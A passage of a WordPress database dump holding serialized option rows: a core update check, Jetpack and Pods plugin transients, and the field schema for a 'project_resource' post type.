p\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:49:\"https://downloads.w.org/release/wordpress-7.0.zip\";s:10:\"no_content\";s:60:\"https://downloads.w.org/release/wordpress-7.0-no-content.zip\";s:11:\"new_bundled\";s:61:\"https://downloads.w.org/release/wordpress-7.0-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:3:\"7.0\";s:7:\"version\";s:3:\"7.0\";s:11:\"php_version\";s:3:\"7.4\";s:13:\"mysql_version\";s:5:\"5.5.5\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}}s:12:\"last_checked\";i:1782103444;s:15:\"version_checked\";s:5:\"6.9.4\";s:12:\"translations\";a:0:{}}','off'),(5303678,'button_contact_legacy','no','auto'),(5638782,'_transient_pods_9f8f571f17a39d66756cfd5fac34afed','a:0:{}','off'),(5638908,'_transient_timeout_pods_78233965e2240a64325e7ac8abfc82f0','1782508588','off'),(5638909,'_transient_pods_78233965e2240a64325e7ac8abfc82f0','a:0:{}','off'),(5644568,'_transient_timeout_jetpack_sync_constants_await','1782107046','off'),(5644569,'_transient_jetpack_sync_constants_await','1782103446.6489','off'),(5644570,'_transient_timeout_jetpack_is_single_user','1782146646','off'),(5644571,'_transient_jetpack_is_single_user','2','off'),(5644572,'_transient_timeout_jetpack_sync_callables_await','1782103506','off'),(5644573,'_transient_jetpack_sync_callables_await','1782103446.6988','off'),(5644574,'_transient_timeout_jetpack_plugin_api_action_links_refresh','1782189846','off'),(5644575,'_transient_jetpack_plugin_api_action_links_refresh','1782103446','off'),(5632171,'_transient_pods_212747a43c2f00eea7d2ee185cfb84cc','a:0:{}','off'),(5632172,'_transient_timeout_pods_5b6ea3d90a45e623bdf77271c6a4b3f2','1782317646','off'),(5632173,'_transient_pods_5b6ea3d90a45e623bdf77271c6a4b3f2','a:0:{}','off'),(5635919,'_transient_is_multi_author','1','on'),(5633405,'_transient_pods_pods_core_loader_objects-3282','a:5:{s:10:\"taxonomies\";a:0:{}s:5:\"media\";b:0;s:4:\"user\";b:0;s:7:\"comment\";b:0;s:8:\"settings\";a:0:{}}','off'),(5634010,'_transient_timeout_pods_6153e5a6000135b008073e50d7d5e889','1782363451','off'),(5634011,'_transient_pods_6153e5a6000135b008073e50d7d5e889','a:0:{}','off'),(5629431,'_transient_timeout_pods_88655171f6828d7463d25bd126ad2637','1782249721','off'),(5629432,'_transient_pods_88655171f6828d7463d25bd126ad2637','a:0:{}','off'),(5629433,'_transient_timeout_pods_e2b4b80fafa5346dc6e45bd86c213512','1782249721','off'),(5629434,'_transient_pods_e2b4b80fafa5346dc6e45bd86c213512','a:0:{}','off'),(5629435,'_transient_timeout_pods_a9e0deeb9f34a08d5a0addfb2b7fb29a','1782249721','off'),(5629436,'_transient_pods_a9e0deeb9f34a08d5a0addfb2b7fb29a','a:0:{}','off'),(5629448,'_transient_timeout_pods_4a3cd66b87dc947d017029af6faf6aa6','1782249729','off'),(5629449,'_transient_pods_4a3cd66b87dc947d017029af6faf6aa6','a:0:{}','off'),(5633404,'_transient_timeout_pods_pods_core_loader_objects-3282','1782346819','off'),(5634008,'_transient_timeout_pods_16ffb0fcf63327f1b33688059f35f50f','1782363451','off'),(5634009,'_transient_pods_16ffb0fcf63327f1b33688059f35f50f','a:28:{s:2:\"ID\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:2:\"ID\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:2:\"id\";}s:20:\"hide_in_default_form\";b:1;}s:10:\"post_title\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"post_title\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:2:{s:14:\"display_filter\";s:9:\"the_title\";s:19:\"display_filter_args\";a:1:{i:0;s:7:\"post_ID\";}}s:5:\"alias\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"name\";}}s:12:\"post_content\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_content\";s:5:\"label\";s:7:\"Content\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:25:\"wysiwyg_allowed_html_tags\";s:0:\"\";s:21:\"wysiwyg_media_buttons\";i:1;s:14:\"display_filter\";s:11:\"the_content\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:12:\"post_excerpt\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_excerpt\";s:5:\"label\";s:7:\"Excerpt\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:20:\"paragraph_allow_html\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";s:14:\"display_filter\";s:11:\"the_excerpt\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"excerpt\";}}s:11:\"post_author\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_author\";s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:16:\"pick_format_type\";s:6:\"single\";s:18:\"pick_format_single\";s:12:\"autocomplete\";s:13:\"default_value\";s:10:\"{@user.ID}\";s:21:\"default_evaluate_tags\";i:1;}s:5:\"alias\";a:1:{i:0;s:6:\"author\";}s:11:\"pick_object\";s:4:\"user\";s:8:\"pick_val\";s:4:\"user\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";}s:9:\"post_date\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_date\";s:5:\"label\";s:12:\"Publish Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:7:\"created\";i:1;s:4:\"date\";}}s:13:\"post_date_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_date_gmt\";s:5:\"label\";s:18:\"Publish Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_status\";s:5:\"label\";s:6:\"Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:5:\"draft\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:11:\"post-status\";s:18:\"pick_format_single\";s:8:\"dropdown\";s:5:\"alias\";a:1:{i:0;s:6:\"status\";}}s:14:\"comment_status\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"comment_status\";s:5:\"label\";s:14:\"Comment Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}}s:11:\"ping_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"ping_status\";s:5:\"label\";s:11:\"Ping Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}s:20:\"hide_in_default_form\";b:1;}s:13:\"post_password\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_password\";s:5:\"label\";s:8:\"Password\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:20:\"hide_in_default_form\";b:1;}s:9:\"post_name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_name\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:4:\"slug\";i:1;s:9:\"permalink\";}}s:7:\"to_ping\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"to_ping\";s:5:\"label\";s:7:\"To Ping\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:6:\"pinged\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"pinged\";s:5:\"label\";s:6:\"Pinged\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"post_modified\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_modified\";s:5:\"label\";s:18:\"Last Modified Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:8:\"modified\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:17:\"post_modified_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:17:\"post_modified_gmt\";s:5:\"label\";s:24:\"Last Modified Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:21:\"post_content_filtered\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:21:\"post_content_filtered\";s:5:\"label\";s:18:\"Content (filtered)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:7:{s:20:\"paragraph_allow_html\";i:1;s:16:\"paragraph_oembed\";i:1;s:21:\"paragraph_wptexturize\";i:1;s:23:\"paragraph_convert_chars\";i:1;s:17:\"paragraph_wpautop\";i:1;s:25:\"paragraph_allow_shortcode\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:9:\"post_type\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:4:\"guid\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"guid\";s:5:\"label\";s:4:\"GUID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"menu_order\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"menu_order\";s:5:\"label\";s:10:\"Menu Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}}s:9:\"post_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_type\";s:5:\"label\";s:4:\"Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:4:\"type\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:14:\"post_mime_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"post_mime_type\";s:5:\"label\";s:9:\"Mime Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"_thumbnail_id\";a:23:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"_thumbnail_id\";s:5:\"label\";s:14:\"Featured Image\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"file\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:16:\"file_format_type\";s:6:\"single\";s:9:\"file_type\";s:10:\"images-any\";s:15:\"file_edit_title\";i:0;s:5:\"alias\";a:0:{}}s:17:\"resource_category\";a:25:{s:2:\"id\";i:0;s:4:\"name\";s:17:\"resource_category\";s:5:\"label\";s:19:\"Resource Categories\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"taxonomy\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:20:\"taxonomy_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:17:\"resource_category\";s:15:\"taxonomy_object\";s:8:\"taxonomy\";s:12:\"taxonomy_val\";s:17:\"resource_category\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;}s:12:\"resource_tag\";a:25:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"resource_tag\";s:5:\"label\";s:13:\"Resource Tags\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"taxonomy\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:20:\"taxonomy_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:12:\"resource_tag\";s:15:\"taxonomy_object\";s:8:\"taxonomy\";s:12:\"taxonomy_val\";s:12:\"resource_tag\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;}s:13:\"resource_type\";a:25:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"resource_type\";s:5:\"label\";s:14:\"Resource Types\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"taxonomy\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:20:\"taxonomy_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:13:\"resource_type\";s:15:\"taxonomy_object\";s:8:\"taxonomy\";s:12:\"taxonomy_val\";s:13:\"resource_type\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;}}','off'),(5634477,'_transient_timeout_pods_9570b2ae7ec09a8309f2b8e80b7af704','1782377875','off'),(5634478,'_transient_pods_9570b2ae7ec09a8309f2b8e80b7af704','a:1:{i:0;i:462;}','off'),(5634479,'_transient_timeout_pods_b5bc3ed1801d78a359080d61b745d881','1782377875','off'),(5634480,'_transient_pods_b5bc3ed1801d78a359080d61b745d881','a:28:{s:11:\"object_type\";s:9:\"post_type\";s:4:\"type\";s:9:\"post_type\";s:11:\"object_name\";s:16:\"project_resource\";s:19:\"object_hierarchical\";b:0;s:7:\"storage\";s:4:\"meta\";s:5:\"table\";s:8:\"wp_posts\";s:10:\"meta_table\";s:11:\"wp_postmeta\";s:9:\"pod_table\";s:24:\"wp_pods_project_resource\";s:8:\"field_id\";s:2:\"ID\";s:11:\"field_index\";s:10:\"post_title\";s:10:\"field_slug\";s:9:\"post_name\";s:10:\"field_type\";s:9:\"post_type\";s:12:\"field_parent\";s:11:\"post_parent\";s:19:\"field_parent_select\";s:17:\"`t`.`post_parent`\";s:13:\"meta_field_id\";s:7:\"post_id\";s:16:\"meta_field_index\";s:8:\"meta_key\";s:16:\"meta_field_value\";s:10:\"meta_value\";s:12:\"pod_field_id\";s:2:\"id\";s:15:\"pod_field_index\";s:4:\"name\";s:14:\"pod_field_slug\";N;s:16:\"pod_field_parent\";N;s:4:\"join\";a:0:{}s:5:\"where\";a:1:{s:9:\"post_type\";s:36:\"`t`.`post_type` = \'project_resource\'\";}s:13:\"where_default\";s:34:\"`t`.`post_status` IN ( \'publish\' )\";s:7:\"orderby\";s:51:\"`t`.`menu_order`, `t`.`post_title`, 